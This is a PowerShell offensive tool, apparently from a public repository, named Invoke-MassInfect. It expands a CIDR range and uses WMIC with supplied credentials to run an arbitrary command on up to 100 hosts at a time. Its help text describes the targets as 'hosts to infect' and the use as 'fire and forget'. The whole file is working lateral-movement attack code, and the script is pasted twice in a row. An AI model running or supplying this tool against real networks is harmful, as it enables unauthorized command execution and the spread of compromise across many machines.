rvrsh3ll/Mass-Infect.ps1

## Mass-Infect.ps1
function Invoke-MassInfect
{
<#
Inspired by Chris Campbell's WMIS command encoder
https://github.com/obscuresec/random/blob/master/EncodeShell.py

CIDR Parser from Matt Graeber's Invoke-PortScanhttps://github.com/mattifestation/PowerSploit/blob/master/Recon/Invoke-Portscan.ps1
https://github.com/mattifestation/PowerSploit/blob/master/Recon/Invoke-Portscan.ps1


.DESCRIPTION

Send commands across a network range quickly with WMIC

.PARAMETER Rhosts

Comma-Separated or CIDR Hosts to infect.

.PARAMETER User

.PARAMETER Password

.Example

Replace username and password with credentials. Add your command, fire and forget.

#>
    [CmdletBinding()]
    Param (
    [Parameter(
        ValueFromPipeline=$True,
        Mandatory=$True)]
        [String]$Rhosts,
    [Parameter(
        ValueFromPipeline=$True,
        Mandatory=$True)]
        [String]$User,
    [Parameter(
        ValueFromPipeline=$True,
        Mandatory=$True)]
        [String]$Password,
    [Parameter(
        ValueFromPipeline=$True,
        Mandatory=$True)]
        [String]$Cmd
    )

    PROCESS {
    Set-StrictMode -Version 2.0

    $hostList = New-Object System.Collections.ArrayList

        [String] $iHosts = $Rhosts.Split(",")

        foreach($iHost in $iHosts)
        {
            $iHost = $iHost.Replace(" ", "")

            if(!$iHost)
            {
                continue
            }

            if($iHost.contains("/"))
            {
                $netPart = $iHost.split("/")[0]
                [uint32]$maskPart = $iHost.split("/")[1]

                $address = [System.Net.IPAddress]::Parse($netPart)
                if ($maskPart -ge $address.GetAddressBytes().Length * 8)
                {
                    throw "Bad host mask"
                }

                $numhosts = [System.math]::Pow(2,(($address.GetAddressBytes().Length *8) - $maskPart))

                $startaddress = $address.GetAddressBytes()
                [array]::Reverse($startaddress)

                $startaddress = [System.BitConverter]::ToUInt32($startaddress, 0)
                [uint32]$startMask = ([System.math]::Pow(2, $maskPart)-1) * ([System.Math]::Pow(2,(32 - $maskPart)))
                $startAddress = $startAddress -band $startMask
                #in powershell 2.0 there are 4 0 bytes padded, so the [0..3] is necessary
                $startAddress = [System.BitConverter]::GetBytes($startaddress)[0..3]
                [array]::Reverse($startaddress)
                $address = [System.Net.IPAddress] [byte[]] $startAddress

                $hostList.Add($address.IPAddressToString)

                for ($i=0; $i -lt $numhosts-1; $i++)
                {
                    $nextAddress =  $address.GetAddressBytes()
                    [array]::Reverse($nextAddress)
                    $nextAddress =  [System.BitConverter]::ToUInt32($nextAddress, 0)
                    $nextAddress ++
                    $nextAddress = [System.BitConverter]::GetBytes($nextAddress)[0..3]
                    [array]::Reverse($nextAddress)
                    $address = [System.Net.IPAddress] [byte[]] $nextAddress
                    $hostList.Add($address.IPAddressToString)

                }

            }
            else
            {
                $hostList.Add($iHost)

            }

         }


        # Loop through targets and invoke our remote command
        # First, we'll setup some threading as seen @ http://pwndizzle.blogspot.com/2013/12/powershell-threading.html
        function ForEach-Parallel {
            [CmdletBinding()]Param (
            [Parameter(Mandatory=$true,position=0)]
            [System.Management.Automation.ScriptBlock] $ScriptBlock,
            [Parameter(Mandatory=$true,ValueFromPipeline=$true)]
            [PSObject]$InputObject,
            [Parameter(Mandatory=$false)]
            [int]$MaxThreads=5
        )
        BEGIN {
            $iss = [system.management.automation.runspaces.initialsessionstate]::CreateDefault()
            $pool = [Runspacefactory]::CreateRunspacePool(1, $maxthreads, $iss, $host)
            $pool.open()
            $threads = @()
            $ScriptBlock = $ExecutionContext.InvokeCommand.NewScriptBlock("param(`$_)`r`n" + $Scriptblock.ToString())
        }
        PROCESS {
            $powershell = [powershell]::Create().addscript($scriptblock).addargument($InputObject)
            $powershell.runspacepool=$pool
            $threads+= @{
                instance = $powershell
                handle = $powershell.begininvoke()
            }
        }
        END {
            $notdone = $true
            while ($notdone) {
                $notdone = $false
                for ($i=0; $i -lt $threads.count; $i++) {
                    $thread = $threads[$i]
                    if ($thread) {
                        if ($thread.handle.iscompleted) {
                            $thread.instance.endinvoke($thread.handle)
                            $thread.instance.dispose()
                            $threads[$i] = $null
                        }
                        else {
                            $notdone = $true
                        }
                    }
                }
            }
        }
    }

    $ErrorActionPreference = "Stop";

        Write-Verbose "Spreading the goodness.."

        $hostList | % { $_ } |ForEach-Parallel -MaxThreads 100 {
        wmic /node:$_  /user: + $User /password: + $Password process call create "cmd.exe /c $cmd"
        }
    }
}
	function Invoke-MassInfect
	{
	<#
	Inspired by Chris Campbell's WMIS command encoder
	https://github.com/obscuresec/random/blob/master/EncodeShell.py

	CIDR Parser from Matt Graeber's Invoke-PortScanhttps://github.com/mattifestation/PowerSploit/blob/master/Recon/Invoke-Portscan.ps1
	https://github.com/mattifestation/PowerSploit/blob/master/Recon/Invoke-Portscan.ps1



	.DESCRIPTION

	Send commands across a network range quickly with WMIC

	.PARAMETER Rhosts

	Comma-Separated or CIDR Hosts to infect.

	.PARAMETER User

	.PARAMETER Password

	.Example

	Replace username and password with credentials. Add your command, fire and forget.

	#>
	[CmdletBinding()]
	Param (
	[Parameter(
	ValueFromPipeline=$True,
	Mandatory=$True)]
	[String]$Rhosts,
	[Parameter(
	ValueFromPipeline=$True,
	Mandatory=$True)]
	[String]$User,
	[Parameter(
	ValueFromPipeline=$True,
	Mandatory=$True)]
	[String]$Password,
	[Parameter(
	ValueFromPipeline=$True,
	Mandatory=$True)]
	[String]$Cmd
	)

	PROCESS {
	Set-StrictMode -Version 2.0

	$hostList = New-Object System.Collections.ArrayList

	[String] $iHosts = $Rhosts.Split(",")

	foreach($iHost in $iHosts)
	{
	$iHost = $iHost.Replace(" ", "")

	if(!$iHost)
	{
	continue
	}

	if($iHost.contains("/"))
	{
	$netPart = $iHost.split("/")[0]
	[uint32]$maskPart = $iHost.split("/")[1]

	$address = [System.Net.IPAddress]::Parse($netPart)
	if ($maskPart -ge $address.GetAddressBytes().Length * 8)
	{
	throw "Bad host mask"
	}

	$numhosts = [System.math]::Pow(2,(($address.GetAddressBytes().Length *8) - $maskPart))

	$startaddress = $address.GetAddressBytes()
	[array]::Reverse($startaddress)

	$startaddress = [System.BitConverter]::ToUInt32($startaddress, 0)
	[uint32]$startMask = ([System.math]::Pow(2, $maskPart)-1) * ([System.Math]::Pow(2,(32 - $maskPart)))
	$startAddress = $startAddress -band $startMask
	#in powershell 2.0 there are 4 0 bytes padded, so the [0..3] is necessary
	$startAddress = [System.BitConverter]::GetBytes($startaddress)[0..3]
	[array]::Reverse($startaddress)
	$address = [System.Net.IPAddress] [byte[]] $startAddress

	$hostList.Add($address.IPAddressToString)

	for ($i=0; $i -lt $numhosts-1; $i++)
	{
	$nextAddress = $address.GetAddressBytes()
	[array]::Reverse($nextAddress)
	$nextAddress = [System.BitConverter]::ToUInt32($nextAddress, 0)
	$nextAddress ++
	$nextAddress = [System.BitConverter]::GetBytes($nextAddress)[0..3]
	[array]::Reverse($nextAddress)
	$address = [System.Net.IPAddress] [byte[]] $nextAddress
	$hostList.Add($address.IPAddressToString)

	}

	}
	else
	{
	$hostList.Add($iHost)

	}

	}


	# Loop through targets and invoke our remote command
	# First, we'll setup some threading as seen @ http://pwndizzle.blogspot.com/2013/12/powershell-threading.html
	function ForEach-Parallel {
	[CmdletBinding()]Param (
	[Parameter(Mandatory=$true,position=0)]
	[System.Management.Automation.ScriptBlock] $ScriptBlock,
	[Parameter(Mandatory=$true,ValueFromPipeline=$true)]
	[PSObject]$InputObject,
	[Parameter(Mandatory=$false)]
	[int]$MaxThreads=5
	)
	BEGIN {
	$iss = [system.management.automation.runspaces.initialsessionstate]::CreateDefault()
	$pool = [Runspacefactory]::CreateRunspacePool(1, $maxthreads, $iss, $host)
	$pool.open()
	$threads = @()
	$ScriptBlock = $ExecutionContext.InvokeCommand.NewScriptBlock("param(`$_)`r`n" + $Scriptblock.ToString())
	}
	PROCESS {
	$powershell = [powershell]::Create().addscript($scriptblock).addargument($InputObject)
	$powershell.runspacepool=$pool
	$threads+= @{
	instance = $powershell
	handle = $powershell.begininvoke()
	}
	}
	END {
	$notdone = $true
	while ($notdone) {
	$notdone = $false
	for ($i=0; $i -lt $threads.count; $i++) {
	$thread = $threads[$i]
	if ($thread) {
	if ($thread.handle.iscompleted) {
	$thread.instance.endinvoke($thread.handle)
	$thread.instance.dispose()
	$threads[$i] = $null
	}
	else {
	$notdone = $true
	}
	}
	}
	}
	}
	}

	$ErrorActionPreference = "Stop";

	Write-Verbose "Spreading the goodness.."

	$hostList \| % { $_ } \|ForEach-Parallel -MaxThreads 100 {
	wmic /node:$_ /user: + $User /password: + $Password process call create "cmd.exe /c $cmd"
	}
	}
	}